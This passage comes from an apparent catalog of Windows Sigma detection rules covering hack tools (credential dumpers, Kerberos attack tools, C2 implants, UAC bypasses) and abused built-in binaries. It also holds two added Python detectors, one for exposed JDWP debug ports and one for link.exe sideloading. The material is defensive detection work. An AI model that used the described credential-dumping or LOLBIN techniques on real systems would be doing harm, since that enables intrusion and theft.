https://github.com/skelsec/pypykatz, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz |
HackTool - PurpleSharp Execution |
Detects the execution of the PurpleSharp adversary simulation tool |
https://github.com/mvelazc0/PurpleSharp |
HackTool - Quarks PwDump Execution |
Detects usage of the Quarks PwDump tool via commandline arguments |
https://github.com/quarkslab/quarkspwdump, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east |
HackTool - RedMimicry Winnti Playbook Execution |
Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility |
https://redmimicry.com/posts/redmimicry-winnti/ |
Potential SMB Relay Attack Tool Execution |
Detects different hacktools used for relay attacks on Windows for privilege escalation |
https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://pentestlab.blog/2017/04/13/hot-potato/, https://github.com/ohpe/juicy-potato, https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes, https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire, https://www.localpotato.com/ |
HackTool - Rubeus Execution |
Detects the execution of the hacktool Rubeus via PE information or command line parameters |
https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus |
HackTool - SafetyKatz Execution |
Detects the execution of the hacktool SafetyKatz via PE information and default Image name |
https://github.com/GhostPack/SafetyKatz |
HackTool - SecurityXploded Execution |
Detects the execution of SecurityXploded Tools |
https://securityxploded.com/, https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/ |
HackTool - PPID Spoofing SelectMyParent Tool Execution |
Detects the use of parent process ID spoofing tools such as Didier Stevens' tool SelectMyParent |
https://pentestlab.blog/2020/02/24/parent-pid-spoofing/, https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks, https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing, https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files |
HackTool - SharPersist Execution |
Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms |
https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit, https://github.com/mandiant/SharPersist |
HackTool - SharpEvtMute Execution |
Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs |
https://github.com/bats3c/EvtMute |
HackTool - SharpLdapWhoami Execution |
Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller |
https://github.com/bugch3ck/SharpLdapWhoami |
HackTool - SharpMove Tool Execution |
Detects, via its PE metadata and command line options, the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" queries and VBScript execution using WMI.
|
https://github.com/0xthirteen/SharpMove/, https://pentestlab.blog/tag/sharpmove/ |
HackTool - SharpUp PrivEsc Tool Execution |
Detects the use of SharpUp, a tool for local privilege escalation |
https://github.com/GhostPack/SharpUp |
HackTool - SharpView Execution |
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems |
https://github.com/tevora-threat/SharpView/, https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview |
HackTool - SharpWSUS/WSUSpendu Execution |
Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
|
https://labs.nettitude.com/blog/introducing-sharpwsus/, https://github.com/nettitude/SharpWSUS, https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1 |
HackTool - SharpChisel Execution |
Detects usage of SharpChisel via its command line arguments |
https://github.com/shantanu561993/SharpChisel, https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ |
HackTool - SharpImpersonation Execution |
Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on a Windows computer remotely (PsExec/WmiExec) or interactively |
https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/, https://github.com/S3cur3Th1sSh1t/SharpImpersonation |
HackTool - SharpDPAPI Execution |
Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.
SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
|
https://github.com/GhostPack/SharpDPAPI |
HackTool - SharpLDAPmonitor Execution |
Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and modification of LDAP objects. |
https://github.com/p0dalirius/LDAPmonitor |
HackTool - SILENTTRINITY Stager Execution |
Detects SILENTTRINITY stager use via PE metadata |
https://github.com/byt3bl33d3r/SILENTTRINITY |
HackTool - Sliver C2 Implant Activity Pattern |
Detects process activity patterns as seen being used by Sliver C2 framework implants |
https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ |
HackTool - SOAPHound Execution |
Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
|
https://github.com/FalconForceTeam/SOAPHound, https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c |
HackTool - Stracciatella Execution |
Detects Stracciatella, which executes a PowerShell runspace from within C# (aka the SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics. |
https://github.com/mgeeky/Stracciatella |
HackTool - SysmonEOP Execution |
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120 |
https://github.com/Wh04m1001/SysmonEoP |
HackTool - TruffleSnout Execution |
Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md, https://github.com/dsnezhkov/TruffleSnout, https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md |
HackTool - UACMe Akagi Execution |
Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata |
https://github.com/hfiref0x/UACME |
HackTool - Windows Credential Editor (WCE) Execution |
Detects the use of Windows Credential Editor (WCE) |
https://www.ampliasecurity.com/research/windows-credentials-editor/ |
HackTool - winPEAS Execution |
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz |
https://github.com/carlospolop/PEASS-ng, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation |
HackTool - WinPwn Execution |
Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
|
https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team |
HackTool - Wmiexec Default Powershell Command |
Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script |
https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py |
HackTool - XORDump Execution |
Detects suspicious use of XORDump process memory dumping utility |
https://github.com/audibleblink/xordump |
Suspicious ZipExec Execution |
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. |
https://twitter.com/SBousseaden/status/1451237393017839616, https://github.com/Tylous/ZipExec |
Suspicious Execution of Hostname |
Detects execution of the "hostname" utility to collect host information as part of system discovery |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname |
Suspicious HWP Sub Processes |
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate exploitation |
https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/, https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1, https://twitter.com/cyberwar_15/status/1187287262054076416, https://blog.alyac.co.kr/1901, https://en.wikipedia.org/wiki/Hangul_(word_processor) |
Potential Fake Instance Of Hxtsr.EXE Executed |
HxTsr.exe ("Microsoft Outlook Communications") is a component of the built-in Mail and Calendar (Outlook) apps and resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
Any instance of hxtsr.exe running from a different location may be malware masquerading as HxTsr.exe.
|
Internal Research |
Use Icacls to Hide File to Everyone |
Detects use of icacls to deny access to "Everyone" on a path under the Users folder, a technique sometimes used to hide malicious files |
https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/ |
File Download And Execution Via IEExec.EXE |
Detects execution of the IEExec utility to download and execute files |
https://lolbas-project.github.io/lolbas/Binaries/Ieexec/ |
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location |
Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
This behavior has been observed in-the-wild by different threat actors.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
Disable Windows IIS HTTP Logging |
Detects the disabling of HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging |
Microsoft IIS Service Account Password Dumped |
Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords |
https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html, https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA, https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/ |
IIS Native-Code Module Command Line Installation |
Detects suspicious IIS native-code module installations via command line |
https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/, https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
Suspicious IIS URL GlobalRules Rewrite Via AppCmd |
Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. |
https://twitter.com/malmoeb/status/1616702107242971144, https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r |
Microsoft IIS Connection Strings Decryption |
Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with access to a Microsoft IIS web server via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command. |
https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html |
Suspicious IIS Module Registration |
Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors |
https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
C# IL Code Compilation Via Ilasm.EXE |
Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. |
https://lolbas-project.github.io/lolbas/Binaries/Ilasm/, https://www.echotrail.io/insights/search/ilasm.exe |
ImagingDevices Unusual Parent/Child Processes |
Detects unusual parent or child processes of ImagingDevices.exe, as seen in Bumblebee activity |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Arbitrary File Download Via IMEWDBLD.EXE |
Detects usage of "IMEWDBLD.exe" to download arbitrary files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ |
InfDefaultInstall.exe .inf Execution |
Detects InfDefaultInstall.exe executing an SCT script via scrobj.dll from a command embedded in a specially prepared INF file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution, https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/ |
File Download Via InstallUtil.EXE |
Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
|
https://github.com/LOLBAS-Project/LOLBAS/pull/239 |
Suspicious Execution of InstallUtil Without Log |
Detects use of the .NET InstallUtil.exe application to execute an image while suppressing installer logging |
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool |
Suspicious Shells Spawn by Java Utility Keytool |
Detects suspicious shell spawn from the Java utility keytool process (e.g. ManageEngine ADSelfService Plus exploitation) |
https://redcanary.com/blog/intelligence-insights-december-2021, https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html |
Suspicious Child Process Of Manage Engine ServiceDesk |
Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service |
https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/, https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py, https://blog.viettelcybersecurity.com/saml-show-stopper/ |
Java Running with Remote Debugging |
Detects a Java process started with JDWP remote debugging enabled on an address that accepts connections from hosts other than localhost |
https://dzone.com/articles/remote-debugging-java-applications-with-jdwp |
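What "more than just localhost" means in practice, as an added example in Python that is not the Sigma rule's own logic. It parses the JDWP agent options from a Java command line and decides whether the debug port is reachable from other hosts. Assumptions: command lines are Sysmon/4688-style strings; JDWP options follow the JDK's documented "-agentlib:jdwp=key=value,..." form (or the legacy "-Xrunjdwp:" form); a bare port in address= listens on all interfaces on JDK 8 and older but only on localhost from JDK 9 onward, so the caller supplies the JDK major version it has evidence for (the default assumes a modern JDK); the events are constructed, not captured.

```python
"""Flag Java processes whose JDWP listener is reachable from other hosts.
Added example; assumptions are listed in the lead-in above."""
import re
from typing import Dict, List, Optional

JDWP_RE = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)([^\s\"']+)", re.IGNORECASE)
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}
WILDCARD_HOSTS = {"*", "0.0.0.0", "::"}


def parse_jdwp_options(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the key=value options of the JDWP agent, or None if absent."""
    m = JDWP_RE.search(cmdline)
    if not m:
        return None
    opts: Dict[str, str] = {}
    for item in m.group(1).split(","):
        key, _, value = item.partition("=")
        opts[key.strip().lower()] = value.strip()
    return opts


def allows_remote_debugging(cmdline: str, jdk_major: int = 17) -> bool:
    """True when the JVM listens for debugger connections on a non-loopback address."""
    opts = parse_jdwp_options(cmdline)
    if opts is None:
        return False
    if opts.get("server", "n").lower() != "y":
        return False  # client mode: the JVM dials out, nothing listens
    if opts.get("transport", "").lower() != "dt_socket":
        return False  # dt_shmem is shared memory, local only
    host, sep, _port = opts.get("address", "").rpartition(":")
    if not sep:
        # Bare port: all interfaces on JDK 8 and older, localhost only on JDK 9+.
        return jdk_major <= 8
    host = host.strip("[]")  # handles [::1]:5005 and [::]:5005
    if host in WILDCARD_HOSTS:
        return True
    return host not in LOOPBACK_HOSTS


# Constructed process-creation records (not real telemetry). "jdk" is the
# major version the analyst has evidence for; absent means a modern JDK.
SAMPLE_EVENTS: List[dict] = [
    {"pid": 1, "cmd": "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar app.jar"},
    {"pid": 2, "cmd": "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=localhost:5005 -jar app.jar"},
    {"pid": 3, "cmd": "java -Xrunjdwp:transport=dt_socket,server=y,address=8000 -jar legacy.jar", "jdk": 8},
    {"pid": 4, "cmd": "java -agentlib:jdwp=transport=dt_socket,server=y,address=[::]:8000 -jar app.jar"},
    {"pid": 5, "cmd": "java -agentlib:jdwp=transport=dt_socket,server=n,address=10.0.0.9:5005 -jar app.jar"},
    {"pid": 6, "cmd": "java -jar app.jar"},
]


def find_remote_debug_targets(events: List[dict]) -> List[int]:
    """PIDs of JVMs that accept debugger connections from other hosts."""
    return [e["pid"] for e in events if allows_remote_debugging(e["cmd"], e.get("jdk", 17))]


if __name__ == "__main__":
    print(find_remote_debug_targets(SAMPLE_EVENTS))
```

A JDWP listener needs no authentication: whoever can reach the port can load and run arbitrary classes in the JVM. Treating a bare port as remote only on old JDKs keeps the check from paging on every developer laptop running a current JDK, at the cost of relying on a version the analyst must actually verify.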
Suspicious Processes Spawned by Java.EXE |
Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/ |
Shell Process Spawned by Java.EXE |
Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/ |
Suspicious SysAidServer Child |
Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) |
https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ |
JScript Compiler Execution |
Detects the execution of the "jsc.exe" (JScript Compiler).
Attackers might abuse this to compile JScript files on the fly and bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/Binaries/Jsc/, https://www.phpied.com/make-your-javascript-a-windows-exe/, https://twitter.com/DissectMalware/status/998797808907046913 |
Kavremover Dropped Binary LOLBIN Usage |
Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. |
https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea |
Windows Kernel Debugger Execution |
Detects execution of the Windows Kernel Debugger "kd.exe". |
Internal Research |
Computer Password Change Via Ksetup.EXE |
Detects password change for the computer's domain account or host principal via "ksetup.exe" |
https://twitter.com/Oddvarmoe/status/1641712700605513729, https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup |
Potentially Suspicious Child Process of KeyScrambler.exe |
Detects potentially suspicious child processes of KeyScrambler.exe |
https://twitter.com/DTCERT/status/1712785421845790799 |
Active Directory Structure Export Via Ldifde.EXE |
Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. |
https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11) |
Logged-On User Password Change Via Ksetup.EXE |
Detects a password change for the logged-on user via "ksetup.exe" |
https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup |
Import LDAP Data Interchange Format File Via Ldifde.EXE |
Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments, allowing arbitrary download of files from a remote server.
|
https://twitter.com/0gtweet/status/1564968845726580736, https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11) |
Uncommon Link.EXE Parent Process |
Detects an uncommon parent process of "LINK.EXE".
Link.EXE is the Microsoft incremental linker, a utility usually bundled with a Visual Studio installation.
Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc.) contain a hardcoded call to the "LINK.EXE" binary without checking its validity.
This allows an attacker to sideload any binary named "link.exe" if one of the aforementioned tools is executed from a different location.
By filtering out the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that may be suspicious or malicious.
|
https://twitter.com/0gtweet/status/1560732860935729152 |
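The filtering idea from the entry above, worked through in Python over constructed Sysmon-style events, as an added example that is not the Sigma rule's own detection. It flags link.exe started by one of the tools that hard-code a call to it when that tool, or link.exe itself, runs from outside the known Visual Studio tree, and separately flags any other parent outside that tree. Assumptions: the caller list comes from the entry; KNOWN_TOOL_DIRS is an illustrative allow-list that must be tuned to the estate's real Visual Studio and Windows Kits paths; the sample events and the version number in the sample path are made up.

```python
"""Spot link.exe launched from, or by, an unexpected location.
Added example; assumptions are listed in the lead-in above."""
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Tools named in the entry above that invoke "LINK.EXE" without validating it.
LINK_CALLERS = {"editbin.exe", "dumpbin.exe", "lib.exe"}

# Assumed allow-list of legitimate tool locations (illustrative; tune per estate).
KNOWN_TOOL_DIRS = (
    "c:\\program files\\microsoft visual studio\\",
    "c:\\program files (x86)\\microsoft visual studio\\",
)


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _in_known_dir(path: str) -> bool:
    return _norm(path).startswith(KNOWN_TOOL_DIRS)


def classify_link_event(ev: dict) -> Optional[str]:
    """Return a reason string when the event deserves a look, else None."""
    image = ev.get("Image", "")
    if PureWindowsPath(image).name.lower() != "link.exe":
        return None
    parent = ev.get("ParentImage", "")
    parent_name = PureWindowsPath(parent).name.lower()
    if parent_name in LINK_CALLERS:
        if _in_known_dir(parent) and _in_known_dir(image):
            return None  # normal build-tool chatter inside the VS tree
        if _in_known_dir(parent):
            return "known caller ran a link.exe outside the install tree"
        return "known caller relocated outside the install tree (sideload vector)"
    if _in_known_dir(parent):
        return None  # e.g. cl.exe or msbuild launching the linker from the VS tree
    return "uncommon parent for link.exe: " + (parent_name or "<unknown>")


# Constructed Sysmon-style events (not real telemetry); the MSVC version is made up.
VS_BIN = ("C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\"
          "14.36.32532\\bin\\Hostx64\\x64\\")
SAMPLE_EVENTS: List[dict] = [
    {"ProcessId": 1001, "Image": VS_BIN + "link.exe", "ParentImage": VS_BIN + "dumpbin.exe"},
    {"ProcessId": 1002, "Image": VS_BIN + "link.exe", "ParentImage": VS_BIN + "cl.exe"},
    {"ProcessId": 1003, "Image": "C:\\Users\\Public\\build\\link.exe",
     "ParentImage": "C:\\Users\\Public\\build\\dumpbin.exe"},
    {"ProcessId": 1004, "Image": "C:\\Users\\Public\\build\\link.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"ProcessId": 1005, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def scan(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (ProcessId, reason) for every link.exe event worth triage."""
    hits = []
    for ev in events:
        reason = classify_link_event(ev)
        if reason:
            hits.append((ev["ProcessId"], reason))
    return hits


if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS):
        print(pid, reason)
```

Event 1003 is the case the entry describes: a signed dumpbin.exe copied next to an attacker's link.exe. Note that the signature of the parent stays valid, so a rule keyed on "unsigned parent" would miss it; the path allow-list is what catches the relocation.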
Rebuild Performance Counter Values Via Lodctr.EXE |
Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. Attackers can abuse this by providing a malicious config file that overwrites the performance counter configuration to confuse and evade monitoring and security solutions. |
https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr |
Suspicious Windows Trace ETW Session Tamper Via Logman.EXE |
Detects the execution of "logman" utility in order to disable or delete Windows trace sessions |
https://twitter.com/0gtweet/status/1359039665232306183?s=21, https://ss64.com/nt/logman.html |
Suspicious CustomShellHost Execution |
Detects the execution of the CustomShellHost binary where the child process is not 'C:\Windows\explorer.exe' |
https://github.com/LOLBAS-Project/LOLBAS/pull/180, https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/ |
LOLBAS Data Exfiltration by DataSvcUtil.exe |
Detects potential data exfiltration by a user via DataSvcUtil.exe |
https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services, https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/ |
Devtoolslauncher.exe Executes Specified Binary |
Detects Devtoolslauncher.exe being used to execute another binary |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/, https://twitter.com/_felamos/status/1179811992841797632 |
DeviceCredentialDeployment Execution |
Detects the execution of DeviceCredentialDeployment to hide a process from view |
https://github.com/LOLBAS-Project/LOLBAS/pull/147 |
Suspicious Diantz Alternate Data Stream Execution |
Detects diantz.exe compressing a target file into a CAB file stored in an Alternate Data Stream (ADS) of the target file. |
https://lolbas-project.github.io/lolbas/Binaries/Diantz/ |
Suspicious Diantz Download and Compress Into a CAB File |
Detects diantz.exe downloading a remote file and compressing it into a CAB file on the local machine. |
https://lolbas-project.github.io/lolbas/Binaries/Diantz/ |
Suspicious Extrac32 Execution |
Detects file download or copy via Extrac32 |
https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ |
Suspicious Extrac32 Alternate Data Stream Execution |
Detects Extrac32 extracting data from a CAB file into an alternate data stream |
https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ |
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS |
Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine |
https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government |
Gpscript Execution |
Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy |
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/, https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ |
Ie4uinit Lolbin Use From Invalid Path |
Detects use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file located in a directory other than the usual ones |
https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/, https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ |
Launch-VsDevShell.PS1 Proxy Execution |
Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. |
https://twitter.com/nas_bench/status/1535981653239255040 |
Potential Manage-bde.wsf Abuse To Proxy Execution |
Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution |
https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/, https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712, https://twitter.com/bohops/status/980659399495741441, https://twitter.com/JohnLaTwC/status/1223292479270600706, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md |
Mavinject Inject DLL Into Running Process |
Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection |
MpiExec Lolbin |
Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary |
https://twitter.com/mrd0x/status/1465058133303246867, https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps |
Execute Files with Msdeploy.exe |
Detects file execution using the msdeploy.exe lolbin |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/, https://twitter.com/pabraeken/status/995837734379032576, https://twitter.com/pabraeken/status/999090532839313408 |
Execute MSDT Via Answer File |
Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) |
https://lolbas-project.github.io/lolbas/Binaries/Msdt/ |
Use of OpenConsole |
